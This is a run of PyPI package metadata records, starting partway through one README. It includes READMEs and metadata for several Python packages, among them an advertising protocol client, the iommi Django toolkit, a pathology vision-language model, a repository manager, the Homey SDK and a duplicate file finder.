- **Auth Token**: `1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ` (optional, public token)
- **Rate Limited**: For testing only, not for production
- **No Auth Mode**: Omit `--auth` flag to test unauthenticated behavior
```
### Configuration Management
```bash
# Save agent with authentication
uvx adcp --save-auth myagent https://agent.example.com mcp
# Prompts for optional auth token
# List saved agents
uvx adcp --list-agents
# Remove saved agent
uvx adcp --remove-agent myagent
# Show config file location
uvx adcp --show-config
```
### Direct URL Access
```bash
# Use URL directly without saving
uvx adcp https://agent.example.com/mcp list_tools
# Override protocol
uvx adcp --protocol a2a https://agent.example.com list_tools
# Pass auth token
uvx adcp --auth YOUR_TOKEN https://agent.example.com list_tools
```
### Examples
```bash
# Get products from saved agent
uvx adcp myagent get_products '{"brief":"Coffee brands for digital video"}'
# Create media buy
uvx adcp myagent create_media_buy '{
"name": "Q4 Campaign",
"budget": 50000,
"start_date": "2024-01-01",
"end_date": "2024-03-31"
}'
# List creative formats with JSON output
uvx adcp --json myagent list_creative_formats | jq '.data'
# Debug connection issues
uvx adcp --debug myagent list_tools
```
### Configuration File
Agent configurations are stored in `~/.adcp/config.json`:
```json
{
"agents": {
"myagent": {
"agent_uri": "https://agent.example.com",
"protocol": "mcp",
"auth_token": "optional-token"
}
}
}
```
## Environment Configuration
```bash
# .env
WEBHOOK_URL_TEMPLATE="https://myapp.com/webhook/{task_type}/{agent_id}/{operation_id}"
WEBHOOK_SECRET="your-webhook-secret"
ADCP_AGENTS='[
{
"id": "agent_x",
"agent_uri": "https://agent-x.com",
"protocol": "a2a",
"auth_token_env": "AGENT_X_TOKEN"
}
]'
AGENT_X_TOKEN="actual-token-here"
```
```python
# Auto-discover from environment
client = ADCPMultiAgentClient.from_env()
```
## Development
```bash
# Install with dev dependencies
pip install -e ".[dev]"
# Run tests
pytest
# Type checking
mypy src/
# Format code
black src/ tests/
ruff check src/ tests/
```
## Contributing
Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
## License
Apache 2.0 License - see [LICENSE](LICENSE) file for details.
## Support
- **API Reference**: [adcontextprotocol.github.io/adcp-client-python](https://adcontextprotocol.github.io/adcp-client-python/)
- **Protocol Documentation**: [docs.adcontextprotocol.org](https://docs.adcontextprotocol.org)
- **Issues**: [GitHub Issues](https://github.com/adcontextprotocol/adcp-client-python/issues)
- **Protocol Spec**: [AdCP Specification](https://github.com/adcontextprotocol/adcp)
| text/markdown | null | AdCP Community <maintainers@adcontextprotocol.org> | null | null | Apache-2.0 | adcp, mcp, a2a, protocol, advertising | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.24.0",
"pydantic>=2.0.0",
"typing-extensions>=4.5.0",
"a2a-sdk>=0.3.0",
"mcp>=1.23.2",
"email-validator>=2.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\"",
"datamodel-code-generator[http]>=0.35.0; extra == \"dev\"",
"pdoc3>=0.10.0; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/adcontextprotocol/adcp-client-python",
"Documentation, https://docs.adcontextprotocol.org",
"Repository, https://github.com/adcontextprotocol/adcp-client-python",
"Issues, https://github.com/adcontextprotocol/adcp-client-python/issues"
] | twine/6.2.0 CPython/3.10.19 | 2026-02-20T09:28:00.961605 | adcp-3.4.0.tar.gz | 295,159 | e1/47/5e7c9a9b3a6e7ce22bdfaad83d2cf2efdba2e6251109ea08d848d90c3547/adcp-3.4.0.tar.gz | source | sdist | null | false | d6563340e5ee81429a744eabee2e2f87 | 12d055c181e78ed7fa3ebb3f69dcab599bd46af93c42f7a6eefd5a67fc531b4f | e1475e7c9a9b3a6e7ce22bdfaad83d2cf2efdba2e6251109ea08d848d90c3547 | null | [
"LICENSE"
] | 254 |
2.4 | lofar-sid | 1.2.11 | Software interface description | # lofar_sid
This Repo contains the Following Proto defintions:
* hosted by the TANGO-opah-GRPC (StationName:50032)
In order to use this in your python project you can use the PIP_EXTRA_INDEX_URL , e.g.
use PIP_EXTRA_INDEX_URL = https://git.astron.nl/api/v4/projects/772/packages/pypi/simple
| text/markdown | null | null | null | null | Apache License 2.0 | null | [
"Development Status :: 3 - Alpha",
"Environment :: Plugins",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Astronomy",
"Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator"
] | [] | https://git.astron.nl/lofar2.0/sid | null | >=3.10 | [] | [] | [] | [
"numpy",
"grpcio-tools"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:27:52.745928 | lofar_sid-1.2.11.tar.gz | 43,522 | 3a/31/ed8341cebf348dd833e50feed84ef0949edc92bb4d59f4a0235b17f0ecb5/lofar_sid-1.2.11.tar.gz | source | sdist | null | false | ff6835df08a25b1a9fd9c904594e1ade | c9f58bf92e3d0990e974a9956773cd63485b3ae1bff4e585857533c2597b539e | 3a31ed8341cebf348dd833e50feed84ef0949edc92bb4d59f4a0235b17f0ecb5 | null | [
"LICENSE"
] | 272 |
2.4 | iommi | 7.23.0 | iommi is a high level framework built on django | iommi
=====
.. image:: https://img.shields.io/badge/Code_on-GitHub-black
:target: https://github.com/iommirocks/iommi
.. image:: https://img.shields.io/discord/773470009795018763?logo=discord&logoColor=fff?label=Discord&color=7389d8
:target: https://discord.gg/ZyYRYhf7Pd
.. image:: https://github.com/iommirocks/iommi/workflows/tests/badge.svg
:target: https://github.com/iommirocks/iommi/actions?query=workflow%3Atests+branch%3Amaster
.. image:: https://codecov.io/gh/iommirocks/iommi/branch/master/graph/badge.svg
:target: https://codecov.io/gh/iommirocks/iommi
.. image:: https://readthedocs.org/projects/iommi/badge/?version=latest
:target: https://docs.iommi.rocks
:alt: Documentation Status
.. image:: https://img.shields.io/badge/code%20style-black-000000.svg
:target: https://github.com/psf/black
iommi is a toolkit to build web apps faster. It's built on Django but goes a lot further.
It has:
- `forms <https://docs.iommi.rocks//forms.html>`_: that feel familiar, but can handle growing complexity better than Django's forms
- `tables <https://docs.iommi.rocks//tables.html>`_: that are powerful out of the box and scale up to arbitrary complexity
- a system to `compose parts <https://docs.iommi.rocks//pages.html>`_:, like forms, menus, and tables, into bigger pages
- tools that will speed up your development like live edit, jump to code, great feedback for missing select/prefetch related, a profiler, and more.
- great error messages when you make a mistake
.. image:: docs/README-demo.gif
Example:
.. code-block:: python
class IndexPage(Page):
title = html.h1('Supernaut')
welcome_text = 'This is a discography of the best acts in music!'
artists = Table(auto__model=Artist, page_size=5)
albums = Table(
auto__model=Album,
page_size=5,
)
tracks = Table(auto__model=Album, page_size=5)
urlpatterns = [
path('', IndexPage().as_view()),
]
This creates a page with three separate tables, a header and some text:
.. image:: docs/README-screenshot.png
For more examples, see the `examples project <https://github.com/iommirocks/iommi/tree/master/examples/examples>`_.
Getting started
---------------
See `getting started <https://docs.iommi.rocks//getting_started.html>`_.
Running tests
-------------
You need to have tox installed, then:
.. code-block::
make venv
source venv/bin/activate
make test
make test-docs
License
-------
BSD
Documentation
-------------
https://docs.iommi.rocks
| null | Anders Hovmöller | boxed@killingar.net | null | null | BSD | iommi | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Programming Language :: Python :: 3"
] | [] | https://github.com/iommirocks/iommi | null | null | [] | [] | [] | [
"Django>=3.2",
"pyparsing"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.6 | 2026-02-20T09:27:47.126816 | iommi-7.23.0.tar.gz | 222,682 | e8/e4/525335cb01501eaace6f44809db9df48661496b88c4dbd9965f028f17ca6/iommi-7.23.0.tar.gz | source | sdist | null | false | ce8ca74d797448dc619a51c66417655e | 391a8797d3e163802ae1da7a6ab4adc3179b70d77487f63fa881abfa4b85029b | e8e4525335cb01501eaace6f44809db9df48661496b88c4dbd9965f028f17ca6 | null | [
"LICENSE",
"AUTHORS.rst"
] | 361 |
2.4 | tickflow | 0.1.3 | TickFlow Python Client | # TickFlow Python SDK
高性能行情数据 Python 客户端,支持 A股、美股、港股。
## 安装
```bash
pip install tickflow[all]
```
## 快速开始
```python
from tickflow import TickFlow
# 初始化客户端
tf = TickFlow(api_key="your-api-key")
# 获取 K 线数据
df = tf.klines.get("600000.SH", period="1d", count=100, as_dataframe=True)
print(df.tail())
# 获取实时行情
quotes = tf.quotes.get(symbols=["600000.SH", "AAPL.US"])
for q in quotes:
print(f"{q['symbol']}: {q['last_price']}")
```
## 异步使用
```python
import asyncio
from tickflow import AsyncTickFlow
async def main():
async with AsyncTickFlow(api_key="your-api-key") as tf:
df = await tf.klines.get("600000.SH", as_dataframe=True)
print(df.tail())
asyncio.run(main())
```
## 批量获取
```python
# 批量获取大量股票数据,自动分批并发请求
symbols = tf.exchanges.get_symbols("SH")[:500]
df = tf.klines.batch(
symbols,
period="1d",
as_dataframe=True,
show_progress=True # 显示进度条
)
```
## 特性
- ✅ 同步/异步双接口
- ✅ DataFrame 原生支持
- ✅ 自动重试(网络错误、服务器错误)
- ✅ 批量请求自动分片
- ✅ 进度条支持
- ✅ 完整类型注解
## 文档
完整文档请访问:https://docs.tickflow.org
## License
MIT
| text/markdown | TickFlow Team | null | null | null | MIT | finance, stock, market-data, trading, api-client | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Financial and Insurance Industry",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Office/Business :: Financial :: Investment",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"httpx>=0.25.0",
"typing-extensions>=4.0.0",
"pandas>=1.5.0; extra == \"pandas\"",
"tqdm>=4.60.0; extra == \"progress\"",
"pandas>=1.5.0; extra == \"all\"",
"tqdm>=4.60.0; extra == \"all\""
] | [] | [] | [] | [
"Documentation, https://docs.tickflow.org"
] | twine/6.2.0 CPython/3.12.4 | 2026-02-20T09:27:05.218213 | tickflow-0.1.3.tar.gz | 20,887 | b0/7a/4cb2630339f5e5cd68504ed992eb15c0b8f1cf3e635b9eebdbb9f0ff88f3/tickflow-0.1.3.tar.gz | source | sdist | null | false | fe6e17e435cce53e5007b02179ba7400 | a97f7a0fddfa46c50f0d0533962ef8344211909d8c6c8e0d1a4362ff40d6f6c6 | b07a4cb2630339f5e5cd68504ed992eb15c0b8f1cf3e635b9eebdbb9f0ff88f3 | null | [] | 240 |
2.4 | antoni-alpha | 0.1.1 | Vision-Language Model for Computational Pathology | # ANTONI-Alpha
Vision-Language Model for Computational Pathology
## Resources
- **Paper:** [OpenReview](https://openreview.net/forum?id=aGPowreqPi) (under review)
- **Model:** [SaltySander/ANTONI-Alpha](https://huggingface.co/SaltySander/ANTONI-Alpha)
- **Dataset:** [SaltySander/HISTAI-Instruct](https://huggingface.co/datasets/SaltySander/HISTAI-Instruct)
- **Data Generation Framework:** [Polysome](https://github.com/computationalpathologygroup/Polysome)
- **Base Model:** [MedGemma-4B-IT](https://huggingface.co/google/medgemma-4b-it)
## Authors
Computational Pathology Group RadboudUMC
## Model Information
ANTONI-Alpha is a vision-language model for computational pathology. It combines Prism vision embeddings (1280-dim) with MedGemma-2B language model through a learned cross-attention projector, enabling natural language interactions with whole slide images.
**Architecture:**
- Vision encoder: Prism (produces tile-level embeddings)
- Language model: MedGemma-2B (4-bit quantized with LoRA)
- Projector: Cross-attention with 256 learnable query tokens
**Training:**
- Stage 1: Projector alignment (frozen LLM)
- Stage 2: Instruction tuning (LoRA fine-tuning)
- Dataset: HISTAI-Instruct (multilingual, multimodal)
## Installation
**From PyPI** (recommended for running the model):
```bash
pip install antoni-alpha
```
**From source** (for development or training):
```bash
git clone https://github.com/computationalpathologygroup/ANTONI-Alpha.git
cd ANTONI-Alpha
pip install -e .
```
### Optional: Flash Attention 2
For improved performance on compatible hardware, install Flash Attention 2:
```bash
pip install flash-attn==2.8.3 --no-build-isolation
```
The `--no-build-isolation` flag allows the build process to use your installed PyTorch. Flash Attention 2 requires CUDA-capable hardware and will be used automatically if installed.
## How to Use
```python
import torch
from pathlib import Path
from antoni_alpha.models.antoni_pretrained import AntoniAlphaPreTrained
# Load model
model = AntoniAlphaPreTrained.from_pretrained(
"SaltySander/ANTONI-Alpha",
device_map="auto",
torch_dtype=torch.bfloat16
)
# Load slide features (Prism embeddings: [num_tiles, 1280])
slide_features = torch.load("slide_features.pt")
slide_latents = slide_features.unsqueeze(0) # Add batch dimension
slide_latents = slide_latents.to(next(model.projection_layer.parameters()).device)
# Run inference
conversation = [{"role": "user", "content": "What tissue is this?"}]
with torch.no_grad():
output_ids = model.generate(
slide_latents=slide_latents,
conversations=[conversation],
max_new_tokens=200,
do_sample=False,
)
response = model.processor.batch_decode(output_ids, skip_special_tokens=True)[0]
print(response)
```
See `examples/inference_example.py` for a complete multi-turn conversation example.
## Input/Output Structure
**Input:**
- `slide_latents`: Tensor of shape `[batch_size, num_tiles, 1280]` (Prism embeddings)
- `conversations`: List of conversation lists in OpenAI format
**Output:**
- Generated text response from the language model
## Training
```bash
# Configure training
python train.py --config config/finetune.yaml
```
Training configurations available in `config/` directory.
## License
This model is released under the [Health AI Developer Foundations License](https://developers.google.com/health-ai-developer-foundations/terms).
## Citation
```bibtex
@inproceedings{moonemans2025open,
title={Democratizing Pathology Co-Pilots: An Open Pipeline and Dataset for Whole-Slide Vision-Language Modeling},
author={Sander Moonemans and Sebastiaan Ram and Fr{\'e}d{\'e}rique Meeuwsen and Carlijn Lems and Jeroen van der Laak and Geert Litjens and Francesco Ciompi},
booktitle={Submitted to Medical Imaging with Deep Learning},
year={2025},
url={https://openreview.net/forum?id=aGPowreqPi},
note={under review}
}
```
| text/markdown | null | Sander Moonemans <sander.moonemans@radboudumc.nl> | null | null | null | deep learning, vision-language models, computational pathology, transformers | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Operating System :: OS Independent"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"torch>=2.0.0",
"transformers>=4.56.2",
"einops>=0.8.0",
"environs>=11.0.0",
"sacremoses>=0.1.1",
"accelerate>=0.21.0",
"peft>=0.6.0",
"numpy>=1.21.0",
"h5py>=3.7.0",
"python-dotenv>=1.0.0",
"bitsandbytes>=0.47.0",
"sentence-transformers>=2.7.0",
"pillow>=12.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"isort>=5.12.0; extra == \"dev\"",
"flake8>=6.0.0; extra == \"dev\"",
"mypy>=1.5.0; extra == \"dev\"",
"pre-commit>=3.0.0; extra == \"dev\"",
"debugpy; extra == \"dev\"",
"flash-attn>=2.8.0; extra == \"training\"",
"wandb>=0.15.0; extra == \"training\"",
"tensorboard>=2.13.0; extra == \"training\""
] | [] | [] | [] | [
"Homepage, https://github.com/computationalpathologygroup/ANTONI-Alpha",
"Repository, https://github.com/computationalpathologygroup/ANTONI-Alpha",
"Documentation, https://github.com/computationalpathologygroup/ANTONI-Alpha#readme",
"Issues, https://github.com/computationalpathologygroup/ANTONI-Alpha/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:26:14.485339 | antoni_alpha-0.1.1.tar.gz | 34,571 | 78/96/afcc9e8e3810d645547a07ff5f5515a5ec02f2ec93cf8beb5348ef853f40/antoni_alpha-0.1.1.tar.gz | source | sdist | null | false | b2516063827b2234be695c1904cf4db5 | 061e7d61934955cfff3c55ecf9c0437c2c1cd7f89bee6f6168d4752c65889aa1 | 7896afcc9e8e3810d645547a07ff5f5515a5ec02f2ec93cf8beb5348ef853f40 | MIT | [
"LICENSE"
] | 228 |
2.4 | smart-repository-manager-core | 0.3.2 | Smart Repository Manager Core - A Python library for managing Git repositories with intelligent synchronization, SSH configuration validation, and GitHub integration. | # Smart Repository Manager Core <sup>v0.3.2</sup>
---
A Python library for managing Git repositories with intelligent synchronization, SSH configuration validation, and GitHub integration.
---
[](https://pypi.org/project/smart-repository-manager-core/)
[](https://github.com/smartlegionlab/smart-repository-manager-core/)

[](https://pypi.org/project/smart-repository-manager-core)
[](https://github.com/smartlegionlab/smart-repository-manager-core/blob/master/LICENSE)
[](https://pypi.org/project/smart-repository-manager-core)
[](https://github.com/smartlegionlab/smart-repository-manager-core/stargazers)
[](https://github.com/smartlegionlab/smart-repository-manager-core/network/members)
---
## Features
- **Repository Management**: Clone, pull, parallel download and sync GitHub repositories with intelligent health checks
- **SSH Configuration**: Automatic SSH key validation and configuration for GitHub
- **User Management**: Multiple user profiles with GitHub token authentication
- **Network Diagnostics**: Comprehensive connectivity checks and network validation
- **Smart Synchronization**: Intelligent sync with auto-repair for broken repositories
- **Configuration Persistence**: User settings and repository state storage
## Installation
```bash
pip install smart-repository-manager-core
```
## Core Services
### Repository Management
- Clone repositories via SSH
- Pull updates with health verification
- Automatic repair of broken repositories
- Repository health diagnostics
- Create repositories archive
- Downloading repositories
### SSH Management
- SSH key validation and permissions checking
- Automatic GitHub SSH configuration
- SSH connection testing
- Key generation and management
### GitHub Integration
- Token authentication and validation
- Repository listing and metadata
- Rate limit monitoring
- User profile management
### Network Services
- Connectivity checks for GitHub and Git services
- DNS resolution testing
- Network diagnostics
### Configuration
- User profile management
- Application settings persistence
- Multi-user support
- Token storage
## Requirements
- Python 3.6+
- Git installed and available in PATH
- SSH client (for SSH operations)
## License
BSD 3-Clause License - See [LICENSE](LICENSE) file for details.
## Related Projects
This core library powers two complete implementations:f
### [CLI Version](https://github.com/smartlegionlab/smart-repository-manager-cli)
A full-featured command-line interface built on top of this core library. Provides terminal-based repository management with all features accessible via commands.
### [GUI Version](https://github.com/smartlegionlab/smart-repository-manager-gui)
A desktop graphical user interface that offers visual management of repositories, SSH configuration, and synchronization tasks. Built for users who prefer point-and-click interaction.
Both implementations use this core library as their engine, ensuring consistent behavior and feature parity across interfaces.
---
## Disclaimer
**Important**: This software is provided "as-is" without any warranties or guarantees. The developers are not responsible for:
- Data loss or corruption
- Repository damage or unintended modifications
- Security breaches or token exposure
- Network issues or connectivity problems
- Any other direct or indirect damages
**Use at your own risk**. Always maintain backups of your repositories and tokens. This project is in active development and may contain bugs or incomplete features.
## Development Status
⚠️ **Active Development** - This project is under active development. Features may change, and stability is not guaranteed. Not recommended for production use without thorough testing.
## Contributing
Currently not accepting contributions as the project is in early development phase.
## Support
For issues and questions, please check the GitHub repository:
[https://github.com/smartlegionlab/smart-repository-manager-core](https://github.com/smartlegionlab/smart-repository-manager-core)
---
**Developer**: [Alexander Suvorov]( https://github.com/smartlegionlab/)
**Contact**: [smartlegiondev@gmail.com](mailto:smartlegiondev@gmail.com)
| text/markdown | null | Alexander Suvorov <smartlegiondev@gmail.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: OS Independent"
] | [] | null | null | >=3.6 | [] | [] | [] | [
"requests==2.32.5"
] | [] | [] | [] | [
"Homepage, https://github.com/smartlegionlab/smart-repository-manager-core"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:25:39.254173 | smart_repository_manager_core-0.3.2.tar.gz | 31,606 | 63/55/dd61b6145f2c57d5a84b70b66e26444eabbd22fad58e85b547f4a9c7f2b7/smart_repository_manager_core-0.3.2.tar.gz | source | sdist | null | false | f2994e8ccf9a42f1c88caf9a4dda69c8 | 9e529184754ab7526c806f3c1bb4db8b41fd2a820b1be80ba7e1e63e22cb6c31 | 6355dd61b6145f2c57d5a84b70b66e26444eabbd22fad58e85b547f4a9c7f2b7 | BSD-3-Clause | [
"LICENSE"
] | 225 |
2.4 | homey-stubs | 0.0.5.0 | Type annotations for the Homey SDK | # homey-stubs
Type annotations for the Homey SDK
### Static type-checkers
These types have been tested with:
- [Pyright](https://github.com/microsoft/pyright) version 1.1.406
A static type-checking package is not required, however, and these stubs will still improve autocomplete suggestions
and error detection in your IDE if you don't install one.
### Example
The following example illustrates some situations that will be caught by pyright.
```python
from homey.driver import Driver
from homey.flow_card_trigger_device import FlowCardTriggerDevice
class MyDriver(Driver):
async def on_init(self) -> None:
# Type "FlowCardTrigger" is not assignable to declared type "FlowCardTriggerDevice"
trigger_card: FlowCardTriggerDevice = self.homey.flow.get_trigger_card("something_happens")
some_token = await self.homey.flow.create_token("some_token", "number", "Some token")
# Type "Literal['value']" is not assignable to type "float | None"
await some_token.set_value("value")
```
| text/markdown | Athom B.V. | null | null | null | null | homey, homey-stubs, smart home, smarthome, typing, stubs, mypy, pyright | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13",
"Typing :: Stubs Only",
"Natural Language :: English",
"Operating System :: OS Independent"
] | [] | null | null | >=3.13 | [] | [] | [] | [] | [] | [] | [] | [
"homepage, https://homey.app/",
"documentation, https://apps.developer.homey.app/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:23.662924 | homey_stubs-0.0.5.0-py3-none-any.whl | 52,546 | b7/fb/c5e703837394d9fae3d90c2e9360ae3f7d98eb23b35a18877e0cb2239237/homey_stubs-0.0.5.0-py3-none-any.whl | py3 | bdist_wheel | null | false | e89a0a07228e1b5160b0416a432d6d41 | 4cf85768cd3b9e99a2c8092c1e82b144665cec6a859c698ab481529987e9e2b2 | b7fbc5e703837394d9fae3d90c2e9360ae3f7d98eb23b35a18877e0cb2239237 | ISC | [] | 98 |
2.4 | homey-apps-sdk-v3 | 0.0.5 | The Homey SDK | # homey-apps-sdk-v3
This is an alias for [homey](https://pypi.org/project/homey/)
# homey
The Python [Homey Apps SDK](https://apps.developer.homey.app/).
When apps are run this package will be supplied for you,
so you do not need to explicitly make it a dependency of your app.
### Static Typing
Typing information for this library is available separately in [homey-stubs](https://pypi.org/project/homey-stubs/)
| text/markdown | null | null | null | null | null | null | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"homey==0.0.5"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:14.490473 | homey_apps_sdk_v3-0.0.5-py3-none-any.whl | 1,402 | dd/73/cbc075b38b1df5e7bd377a7e1e6dc980afaf22a6a9fe43dc00838c7658cc/homey_apps_sdk_v3-0.0.5-py3-none-any.whl | py3 | bdist_wheel | null | false | ec6d983438c26d277f0b7a77994c138b | 12e7837d8f9ba58e4b8f38e35948bd06ccd46993c1b689fe559b3e47dbf1afe1 | dd73cbc075b38b1df5e7bd377a7e1e6dc980afaf22a6a9fe43dc00838c7658cc | ISC | [] | 92 |
2.4 | homey | 0.0.5 | The Homey SDK | # homey
The Python [Homey Apps SDK](https://apps.developer.homey.app/).
When apps are run this package will be supplied for you,
so you do not need to explicitly make it a dependency of your app.
### Static Typing
Typing information for this library is available separately in [homey-stubs](https://pypi.org/project/homey-stubs/)
| text/markdown | null | null | null | null | null | null | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.13 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:13.223620 | homey-0.0.5-py3-none-any.whl | 105,351 | c1/8a/da5cd41a8a5add11d3b9409d435c7977c873fe47cc6efb097a0b17e5c128/homey-0.0.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 51ba8104ae0db46f8d86dd773ac2e970 | e7d9f24774aeaf88351794b48cf4b00a1d24699f0e257e6043c753cc8be6969a | c18ada5cd41a8a5add11d3b9409d435c7977c873fe47cc6efb097a0b17e5c128 | ISC | [] | 109 |
2.4 | onlyone | 2.4.7 | Fast duplicate file finder with optional GUI |
# [OnlyOne](https://github.com/initumX/onlyone)

A PyQt-based tool for finding and removing duplicate files with advanced filtering and progress tracking.
*Note: GUI-version is "extra"(not mandatory part), so to install app with gui, use:
`pip install onlyone[gui]`
## How to install and run
1. Create python virtual environment and go there: `python3 venv ~/onlyone && cd ~/onlyone`
2. Activate it: `source ~/onlyone/bin/activate`
3. Install onlyone into it: `pip install onlyone[gui]`
4. Run the app: `onlyone-gui` or `onlyone`(for cli)
Binary for linux and windows are available in [github release](https://github.com/initumX/onlyone/releases)
### Features
* Filtering by file size and extension
* Sorting inside duplicate groups
* Supporting various deduplication modes
* Preview images/pdf directly in the interface
* Context menu(open/delete/reveal in explorer)
* Progress tracking (in gui-version)
* One click deletion (delete all duplicates at once)
* Priority and excluded directories functionality
* Statistics/report
### How does it work?
1. Recursively scans folder using filters (min/max size, extension)
2. Applies one of the initial grouping ways from "boosting" option (size, size+extension, etc)
3. Further checking depends on mode:
* "fast": checks hash-sum of first 128+ KB (false positives very possible)
* "normal": checks hash-sum of 3 parts of the file: front -> middle -> end (generally reliable)
* "full": checks hash-sum of front -> middle -> entire file (very slow for large files)
4. Shows the list of groups sorted in descending order (groups with larger files come first).
**Files inside a group are sorted by path/filename length (you can regulate this).
### Deleting all duplicates at once
The main principle: ALL files moved to trash EXCEPT the FIRST file in each group.
Which file is "first" depends on sorting:
* Priority files(files from "Priority Folders", if set) always come first
* Among priorities: file with shortest path (by default) comes first
* Among non-priorities: same rule (shortest path is used by default for in-group sorting)
If both files have the same path depth, the file with shortest filename wins the first place.
REMEMBER: In the end, there can be only one file/per group :)
---
### How to use cli-version
Examples:
Basic usage - find duplicates in Downloads folder:
`onlyone -i ~/Downloads`
Filter files by size and extensions and find duplicates:
`onlyone -i .~/Downloads -m 500KB -M 10MB -x .jpg,.png`
Same as above + move duplicates to trash (with confirmation prompt):
`onlyone -i .~/Downloads -m 500KB -M 10MB -x .jpg,.png --keep-one`
Same as above but without confirmation and with output to a file (for scripts):
`onlyone -i .~/Downloads -m 500KB -M 10MB -x .jpg,.png --keep-one --force > ~/Downloads/report.txt`
Options:
`-i, --input` input folder
`-m, --min-size` min size filter
`-M, --max-size` max size filter
`-x, --extensions` extension filter(space separated)
`-p, --priority-dirs` priority dirs(space separated)
`--excluded-dirs` excluded/ignored dirs (space separated)
`--boost {size,extension,filename}` Rule for initial file grouping:
* `size` Group files of the same size only (default)
* `extension` Group files of the same size and extension
* `filename` Group files of the same size and filename
`**Groups formed above will be checked (hash-checking) in further stages`
`--mode {fast, normal, full}` checking mode (normal by default)
* `fast` checks only by hashsum from the front part of file
* `normal` checks by hashsum from 3 parts of file
* `full` checks by hashsum from 2 part + whole file hashsum
`--sort {shortest-path, shortest-filename}` sorting inside a group (shortest-path by default)
`--keep-one` Keep one file/per group and move the rest to trash (one confirmation)
`--keep-one --force` Keep one file/per group and move the rest to trash (no confirmation)
`--verbose, -v` Show detailed statistics and progress
`--help, -h` Show help file
### TESTS
`pytest tests/ -v`
### Build with Pyinstaller
`pyinstaller --noconfirm --clean --noconsole --copy-metadata=onlyone --onefile --paths ./src --name=OnlyOne --exclude-module=PySide6.QtNetwork ./src/onlyone/gui/launcher.py`
### Built With
- Python 3.x
- PySide6 (Qt)
- send2trash
- PIL/Pillow (for image handling)
- xxhash
### LINKS
* [GitHub Page](https://github.com/initumX/onlyone)
* [Releases](https://github.com/initumX/onlyone/releases)
* [Changelog](https://github.com/initumX/onlyone/blob/main/CHANGELOG.md)
* [PyPI](https://pypi.org/project/onlyone/)
* email (initum.x@gmail.com)
© 2026 initumX
| text/markdown | null | initumX <initum.x@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Qt",
"Intended Audience :: End Users/Desktop",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Utilities"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"xxhash>=3.0.0",
"send2trash>=1.8.0",
"PySide6; extra == \"gui\"",
"Pillow>=9.0.0; extra == \"gui\"",
"pytest>=7.0; extra == \"dev\"",
"pytest-qt>=4.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\""
